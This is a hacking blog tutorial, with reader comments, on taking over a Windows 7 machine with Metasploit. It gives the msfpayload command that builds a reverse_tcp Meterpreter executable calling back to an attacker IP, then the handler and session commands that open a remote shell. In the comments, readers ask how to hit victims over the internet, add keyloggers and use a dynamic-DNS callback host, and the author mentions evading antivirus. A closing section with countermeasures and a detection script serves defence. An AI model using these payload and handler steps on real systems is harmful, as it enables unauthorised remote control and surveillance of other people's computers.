Create Simple Exploit Using Metasploit to Hack Windows 7


Type : Tutorial

Level : Easy

As I already wrote in my previous post about how to add a user with administrator rights (you can read the tips and tricks here), today I will write a simple tutorial on creating an exploit for Windows 7, and in fact for other Windows versions as well.

Everyone loves the simple way, isn’t it? That’s why in my previous tutorial and in today’s tutorial I keep everything simple and easy to use :-)

In today’s tutorial we will learn how to create a simple exploit (easy to create and easy to implement :-) ) and how to connect to a Windows 7 victim that has already executed our simple exploit… simple, isn’t it?

Okay let’s start the tutorial.

Requirements :

1. Metasploit Framework
2. Windows XP and earlier Windows versions (I use Windows 7 SP1)

Step by Step :

FYI: in this tutorial I use Backtrack 5 R2 with Metasploit Framework 4.2.0, and my IP address is 192.168.8.91.

1. Open your terminal console and type the following command:

msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.8.91 X > Desktop/v4L.exe

The above command creates a Windows executable named "v4L.exe" and saves it on your desktop. The payload is a reverse TCP Meterpreter stager: when the file runs, it connects back to LHOST (here 192.168.8.91) on the default port, 4444, so the listening side must be reachable from the Windows machine. (In current Metasploit releases the msfpayload tool has been replaced by msfvenom, which builds the same payload.)

2. Now you need to copy the newly created v4L.exe to your Windows 7 system. If you don’t know how to share a folder from your Backtrack 5 system, you can view the tutorial on sharing a folder in Backtrack (view tutorial here).

3. Next we need to create a handler to receive the connection that comes to our Backtrack system from the simple exploit we created above. Open your Metasploit console and type the following commands:

Information:

use exploit/multi/handler --> use the Metasploit generic handler (it only listens; it does not exploit anything itself)

set payload windows/meterpreter/reverse_tcp --> we use reverse_tcp (see step 1)

set lhost 192.168.8.91 --> set our local IP address that will catch the reverse connection

exploit -j -z --> start the handler as a background job (-j) and do not interact with the session automatically (-z)

4. Now execute the simple exploit we copied to Windows 7 and check whether our handler receives something. Below is the screenshot of my handler when Windows 7 executed the simple exploit.

I use sessions -l to list every session that is currently open.

5. To interact with an available session, use sessions -i <session_id>. From there you can run other commands as you want.

Yes, we’re inside the Windows 7 machine now :-)

Countermeasures :

1. Install a third-party firewall and antivirus and keep them updated. The firewall matters because the payload used here is an outbound reverse connection, so an outbound rule that blocks unknown executables stops it even when no inbound port is open.
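As an added example that is not part of the original tutorial, the script below shows the detection side of steps 3 and 4: it reads constructed host network-connection records (the pipe-delimited field layout is an assumption for this example, not a real product format) and flags a process running from a user-writable folder, such as the Desktop copy of v4L.exe, that opens an outbound TCP connection to 4444, the default LPORT of windows/meterpreter/reverse_tcp.

```python
import re

# Constructed sample records in a simplified Sysmon-like network-connect layout
# (the field order is an assumption for this example, not a real product format):
# time|host|image|dest_ip|dest_port|initiated
SAMPLE_LOG = """\
2012-05-01T10:01:02|WIN7-LAB|C:\\Windows\\System32\\svchost.exe|192.168.8.1|53|true
2012-05-01T10:01:05|WIN7-LAB|C:\\Users\\user\\Desktop\\v4L.exe|192.168.8.91|4444|true
2012-05-01T10:01:09|WIN7-LAB|C:\\Program Files\\Internet Explorer\\iexplore.exe|203.0.113.10|443|true
2012-05-01T10:02:00|WIN7-LAB|C:\\Users\\user\\Downloads\\update.exe|10.0.0.5|4444|true
2012-05-01T10:02:30|WIN7-LAB|C:\\Users\\user\\Desktop\\tool.exe|203.0.113.20|8080|true
2012-05-01T10:03:00|WIN7-LAB|C:\\Users\\user\\Desktop\\v4L.exe|192.168.8.91|4444|false
"""

HANDLER_PORTS = {4444}   # Metasploit's default LPORT for reverse_tcp
WEB_PORTS = {80, 443}    # ordinary browser traffic, not flagged on its own
USER_WRITABLE = re.compile(r"^C:\\Users\\[^\\]+\\(Desktop|Downloads|AppData)\\", re.I)


def parse_record(line):
    """Split one pipe-delimited record into a dict with typed fields."""
    time, host, image, dest_ip, dest_port, initiated = line.split("|")
    return {"time": time, "host": host, "image": image, "dest_ip": dest_ip,
            "dest_port": int(dest_port), "initiated": initiated == "true"}


def classify(rec):
    """Return the reasons an outbound connection looks like a reverse-shell callback."""
    reasons = []
    if not rec["initiated"]:          # inbound connections are a different case
        return reasons
    if rec["dest_port"] in HANDLER_PORTS:
        reasons.append("default Metasploit handler port")
    if USER_WRITABLE.match(rec["image"]) and rec["dest_port"] not in WEB_PORTS:
        reasons.append("executable in user-writable directory on non-web port")
    return reasons


def scan(log_text):
    """Run classify() over every record and collect the alerts."""
    alerts = []
    for line in log_text.splitlines():
        if not line.strip():
            continue
        rec = parse_record(line)
        reasons = classify(rec)
        if reasons:
            alerts.append({"time": rec["time"], "image": rec["image"],
                           "dest": f"{rec['dest_ip']}:{rec['dest_port']}",
                           "reasons": reasons})
    return alerts


if __name__ == "__main__":
    for a in scan(SAMPLE_LOG):
        print(a["time"], a["image"], "->", a["dest"], "|", "; ".join(a["reasons"]))
```

Port-based matching alone is weak because LPORT is chosen by whoever builds the payload, which is why the second heuristic keys on where the executable lives rather than on the port.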

Hope it’s useful :-)


Blogger at hacking-tutorial.com. Loves PHP, offensive security and the web. Contact him at me[-at-]vishnuvalentino.com

19 Responses to “Create Simple Exploit Using Metasploit to Hack Windows 7”

  1. hair says:

    hi man… nice post! please help me, how to make it remote? is it possible on win xp?

    please send to my email *about Hacking Remote Desktop… thanks a lot, I need to learn to work in security testing >X

  2. BlackTrminatr says:

    Nice post… but can you tell me how to do this remotely? I have configured my router for port forwarding but don’t know what to do next…

    Thanks

    • v4L says:

      #BlackTrminatr
      You need to understand how the exploit and payload work. Maybe you can give a try to the simple explanation in this tutorial http://www./hacking-tutorial/hacking-into-xp-sp3-via-microsoft-office-excel-ms11_021_xlb_bof-vulnerability/ about lport and lhost; and I think this tutorial is clear enough for the basics http://www./hacking-tutorial/how-to-do-hacking-the-internet-wan-not-lan-using-metasploit-the-logic/

  3. nathan says:

    hey man, awesome blog!
    Quick question: wondering whether it’s possible to add a .exe keylogger after the exploit has occurred, place it on the victim’s computer and somehow click it so it activates

  4. Prakash Tomar says:

    Hey man, I just created an account on 000webhost, a free web hosting site, and there I redirected my own website URL to google.com. But now what do I have to do? I’m not getting how to hack a WAN computer. I know I have to create a payload and listener, but what about the server? Please help me.

  5. r12 says:

    I am using a dongle with a dynamic IP. I am using a host name from no-ip.com to redirect my dynamic IP address, so I typed this to create the .exe file:
    “msfpayload windows/meterpreter/reverse_tcp LHOST=myhostname.zapto.org X > Desktop/v4l.exe”

    and then I set up the handler and payload and set the lhost:
    “set lhost myhostname.zapto.org”

    but when I execute the exploit command there’s an error:
    “Handler failed to bind to 180.214.233.37:4444”

    ps: 180.214.233.37 is my current dynamic global IP address

    what should I do? help me plz….

  6. r12 says:

    I am able to use msf on a virtual LAN, thanks to your tutorials. But I want to do it over the internet; FYI I don’t have a router, I only have a computer and a dongle. Do you have any idea about the error message I showed you above? Oh, and in spite of the error, I tried to execute the .exe on my friend’s computer, but no session appears on the server machine.
    Any help would be really appreciated. THANKS

  7. gabeapp says:

    Let’s say I am able to get the file onto the victim’s computer; how can I use this if the target is in an external location?

  8. shinobi says:

    Hi my friend, I’d like to thank you for this post, and I also appreciate your easy way of explaining things. However, what’s the usefulness of this tutorial since it can NEVER bypass any security measures, and why do you specify this attack for Windows 7?? This exe meterpreter can be used on any Microsoft system, ONLY if firewalls & antiviruses are disabled :-(

    • v4L says:

      #shinobi
      you didn’t feel the usefulness because you want the fast and easy way :-)
      with all of this you can also build a new one without being caught by antivirus, but of course for all of it you need to make an effort to learn more after you know the basics.

  9. Ahmed El-Nagdy says:

    Thanks for your efforts:
    But…
    I am trying to run this “exploit” to hack XP SP3
    The result is:
    msf exploit(ms08_067_netapi) > exploit -j -z
    [*] Exploit running as background job.

    [-] Handler failed to bind to 192.168.201.135:4444
    [-] Handler failed to bind to 0.0.0.0:4444
    [-] Exploit failed: Rex::AddressInUse The address is already in use (0.0.0.0:4444).

    I am waiting for your answer.
    Please accept my best regards.

  10. Stanko says:

    Hi,

    I have two computers: one, my Mac, which is running BT5r3 on VMware Fusion, and a Windows 7 laptop. They are both connected to the same WLAN, same router, everything. Which tutorial do I follow to exploit the Windows 7 laptop? Because even though I disable my firewall/AV I’m still having problems with armitage/fast-track, etc. :/

    • v4L says:

      #Stanko

      you can start learning from here http://www./tips-and-trick/install-metasploitable-on-virtual-box/, and you can try using your armitage. We can’t just run armitage and hope to find a red vulnerable PC when scanning, because nowadays the vulnerabilities come from 3rd party applications. Maybe updating your armitage + metasploit framework is a good idea to start.
